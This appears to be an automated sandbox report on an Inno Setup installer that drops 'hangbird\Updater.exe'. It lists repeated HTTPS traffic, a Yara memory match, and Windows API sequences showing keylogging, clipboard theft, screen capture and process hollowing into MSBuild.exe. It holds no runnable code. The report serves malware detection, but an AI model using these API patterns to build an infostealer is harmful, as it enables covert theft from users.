Source: file.exe, 00000000.00000003.1677553862.000000007F86B000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.1676905528.0000000003260000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000001.00000000.1678965208.0000000000E91000.00000020.00000001.01000000.00000004.sdmp, file.tmp, 00000003.00000000.1685727842.000000000029D000.00000020.00000001.01000000.00000009.sdmp, file.tmp.0.dr, file.tmp.2.dr	String found in binary or memory: https://www.innosetup.com/
Source: file.exe, 00000000.00000003.1677553862.000000007F86B000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.1676905528.0000000003260000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000001.00000000.1678965208.0000000000E91000.00000020.00000001.01000000.00000004.sdmp, file.tmp, 00000003.00000000.1685727842.000000000029D000.00000020.00000001.01000000.00000009.sdmp, file.tmp.0.dr, file.tmp.2.dr	String found in binary or memory: https://www.remobjects.com/ps

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 49817 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 49789 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49800 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49781 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49803 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49795 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49826 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 49772 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49820 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49812 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49784 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49806 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49823 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49777 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49798 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49790 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49819 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49834 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49787 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49828 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49793 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49805 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49831 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49774 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49834
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49833
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49782 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49799
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49832
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49798
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49831
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49797
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49830
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49796
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49795
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49794
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49793
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49792
Source: unknown	Network traffic detected: HTTP traffic on port 49814 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49822 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49791
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49790
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49796 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49825 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49808 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49829
Source: unknown	Network traffic detected: HTTP traffic on port 49811 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49828
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49827
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49826
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49825
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49824
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49823
Source: unknown	Network traffic detected: HTTP traffic on port 49771 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49789
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49822
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49788
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49821
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49787
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49820
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49786
Source: unknown	Network traffic detected: HTTP traffic on port 49779 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49785
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49784
Source: unknown	Network traffic detected: HTTP traffic on port 49813 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49783
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49782
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49781
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49780
Source: unknown	Network traffic detected: HTTP traffic on port 49785 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49807 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49833 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49819
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49818
Source: unknown	Network traffic detected: HTTP traffic on port 49776 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49799 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49810 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49817
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49816
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49815
Source: unknown	Network traffic detected: HTTP traffic on port 49791 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49814
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49813
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49779
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49812
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49778
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49811
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49777
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49810
Source: unknown	Network traffic detected: HTTP traffic on port 49816 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49776
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49775
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49774
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown	Network traffic detected: HTTP traffic on port 49788 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49780 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49794 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49827 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49802 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49809
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49808
Source: unknown	Network traffic detected: HTTP traffic on port 49830 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49807
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49806
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49805
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49804
Source: unknown	Network traffic detected: HTTP traffic on port 49773 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49803
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49802
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49801
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49800
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 49783 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 49821 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49815 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49770 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49797 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49801 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49824 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49809 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 49778 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49818 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49786 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49804 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49829 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49832 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49775 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 49792 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745

Source: unknown	HTTPS traffic detected: 104.21.85.194:443 -> 192.168.2.4:49739 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.85.194:443 -> 192.168.2.4:49741 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.4:49742 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.85.194:443 -> 192.168.2.4:49743 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.85.194:443 -> 192.168.2.4:49749 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.85.194:443 -> 192.168.2.4:49755 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.4:49760 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.85.194:443 -> 192.168.2.4:49766 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.85.194:443 -> 192.168.2.4:49777 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.85.194:443 -> 192.168.2.4:49793 version: TLS 1.2

Source: C:\Users\user\AppData\Local\hangbird\Updater.exe

Code function: 35_2_00B9F664 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

35_2_00B9F664

Source: C:\Users\user\AppData\Local\hangbird\Updater.exe

Code function: 35_2_00B9F8D3 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

35_2_00B9F8D3

Source: C:\Users\user\AppData\Local\hangbird\Updater.exe

35_2_00B9F664

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 36_2_004359B7 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,

36_2_004359B7

Source: C:\Users\user\AppData\Local\hangbird\Updater.exe

Code function: 35_2_00B8AA95 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,

35_2_00B8AA95

Source: C:\Users\user\AppData\Local\hangbird\Updater.exe

Code function: 35_2_00BB9FB4 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,

35_2_00BB9FB4

Source: Yara match

File source: Process Memory Space: Updater.exe PID: 7592, type: MEMORYSTR

Source: C:\Users\user\AppData\Local\hangbird\Updater.exe

Code function: 35_2_01406DB1 CreateDesktopA,CreateProcessA,CreateProcessA,CreateProcessA,CreateProcessA,WaitForSingleObject,

35_2_01406DB1

Source: C:\Users\user\AppData\Local\hangbird\Updater.exe

Code function: 35_2_0140A239 GetCurrentProcessId,CreateProcessA,NtQueryInformationProcess,ReadProcessMemory,ReadProcessMemory,WriteProcessMemory,ResumeThread,Sleep,GetTickCount,

35_2_0140A239

Source: C:\Users\user\AppData\Local\hangbird\Updater.exe

Code function: 35_2_00B8E3CB: CreateFileW,DeviceIoControl,CloseHandle,

35_2_00B8E3CB

Source: C:\Users\user\AppData\Local\hangbird\Updater.exe

Code function: 35_2_00B8230F LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

35_2_00B8230F

Source: C:\Users\user\AppData\Local\hangbird\Updater.exe

Code function: 35_2_00B8F76E ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,

35_2_00B8F76E

Source: C:\Users\user\AppData\Local\hangbird\Updater.exe	Code function: 35_2_00B27070	35_2_00B27070
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe	Code function: 35_2_00B33AD9	35_2_00B33AD9
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe	Code function: 35_2_00B5E32F	35_2_00B5E32F
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe	Code function: 35_2_00B424CA	35_2_00B424CA
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe	Code function: 35_2_00B56599	35_2_00B56599
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe	Code function: 35_2_00BAC844	35_2_00BAC844
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe	Code function: 35_2_00B429E3	35_2_00B429E3
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe	Code function: 35_2_00B4C9C0	35_2_00B4C9C0
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe	Code function: 35_2_00B3CBF0	35_2_00B3CBF0
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe	Code function: 35_2_00B56C09	35_2_00B56C09
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe	Code function: 35_2_00B92D81	35_2_00B92D81
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe	Code function: 35_2_00B2CE20	35_2_00B2CE20
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe	Code function: 35_2_00B2EE00	35_2_00B2EE00
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe	Code function: 35_2_00B42F23	35_2_00B42F23
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe	Code function: 35_2_00B3F0DA	35_2_00B3F0DA
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe	Code function: 35_2_00B89168	35_2_00B89168
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe	Code function: 35_2_00BB525A	35_2_00BB525A
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe	Code function: 35_2_00B3D37F	35_2_00B3D37F
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe	Code function: 35_2_00B47746	35_2_00B47746
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe	Code function: 35_2_00B47975	35_2_00B47975
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe	Code function: 35_2_00B41964	35_2_00B41964
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe	Code function: 35_2_00B47BD2	35_2_00B47BD2
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe	Code function: 35_2_00B2DC70	35_2_00B2DC70
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe	Code function: 35_2_00B59D1E	35_2_00B59D1E
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe	Code function: 35_2_00B41FC1	35_2_00B41FC1
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe	Code function: 35_2_01409B8A	35_2_01409B8A
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe	Code function: 35_2_01409B91	35_2_01409B91
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 36_2_004100C5	36_2_004100C5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 36_2_0042509D	36_2_0042509D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 36_2_00410130	36_2_00410130
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 36_2_0043A2E0	36_2_0043A2E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 36_2_0041D5AF	36_2_0041D5AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 36_2_00444620	36_2_00444620
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 36_2_0042A6D0	36_2_0042A6D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 36_2_00426800	36_2_00426800
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 36_2_0040F970	36_2_0040F970
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 36_2_0043A97E	36_2_0043A97E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 36_2_0042EB60	36_2_0042EB60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 36_2_00401000	36_2_00401000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 36_2_00410118	36_2_00410118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 36_2_004431D0	36_2_004431D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 36_2_004331DE	36_2_004331DE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 36_2_004291E0	36_2_004291E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 36_2_004241E0	36_2_004241E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 36_2_00442EB0	36_2_00442EB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 36_2_0040F250	36_2_0040F250
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 36_2_0040B260	36_2_0040B260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 36_2_0040A270	36_2_0040A270
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 36_2_0043E230	36_2_0043E230
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 36_2_004432C0	36_2_004432C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 36_2_004012D5	36_2_004012D5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 36_2_0041E298	36_2_0041E298
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 36_2_00401328	36_2_00401328
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 36_2_0042C3E0	36_2_0042C3E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 36_2_00442380	36_2_00442380
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 36_2_004433B0	36_2_004433B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 36_2_0042F4DD	36_2_0042F4DD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 36_2_00429494	36_2_00429494
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 36_2_004094BF	36_2_004094BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 36_2_0041F510	36_2_0041F510
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 36_2_004255A4	36_2_004255A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 36_2_004335B0	36_2_004335B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 36_2_0042D642	36_2_0042D642
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 36_2_0042762D	36_2_0042762D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 36_2_004386FE	36_2_004386FE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 36_2_004226A0	36_2_004226A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 36_2_0042762D	36_2_0042762D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 36_2_0040D760	36_2_0040D760
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 36_2_00441720	36_2_00441720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 36_2_00443720	36_2_00443720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 36_2_0040A730	36_2_0040A730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 36_2_00429494	36_2_00429494
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 36_2_0042B7D9	36_2_0042B7D9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 36_2_0042B7FE	36_2_0042B7FE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 36_2_00442850	36_2_00442850
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 36_2_0041482A	36_2_0041482A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 36_2_004038E0	36_2_004038E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 36_2_00439940	36_2_00439940
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 36_2_00407960	36_2_00407960
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 36_2_00444920	36_2_00444920
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 36_2_00431980	36_2_00431980
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 36_2_0042AA40	36_2_0042AA40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 36_2_0042CA72	36_2_0042CA72
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 36_2_00420A24	36_2_00420A24
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 36_2_00421B40	36_2_00421B40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 36_2_0040DB20	36_2_0040DB20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 36_2_00415BD8	36_2_00415BD8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 36_2_00439BA0	36_2_00439BA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 36_2_00414BBF	36_2_00414BBF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 36_2_00444C50	36_2_00444C50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 36_2_00434C60	36_2_00434C60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 36_2_0042AC04	36_2_0042AC04
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 36_2_0043EC20	36_2_0043EC20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 36_2_0040ECC0	36_2_0040ECC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 36_2_00427CD2	36_2_00427CD2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 36_2_0041ECDE	36_2_0041ECDE
